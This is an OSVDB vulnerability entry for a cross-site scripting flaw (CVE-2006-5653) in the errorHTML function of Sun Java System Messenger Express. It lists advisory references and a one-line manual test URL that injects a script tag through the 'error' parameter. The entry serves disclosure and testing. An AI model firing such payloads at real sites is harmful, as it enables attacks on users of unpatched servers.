Sun Java System Messenger Express errorHTML Function XSS

2006-10-30T10:33:48
ID OSVDB:30151
Type osvdb
Reporter OSVDB
Modified 2006-10-30T10:33:48

Description

Manual Testing Notes

https://[target]/?user=&error=%3Cscript%3Ealert('hakin9');%3C/script%3E</a>

References:

Secunia Advisory ID:22663 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0510.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0208.html FrSIRT Advisory: ADV-2006-4281 CVE-2006-5653 Bugtraq ID: 20832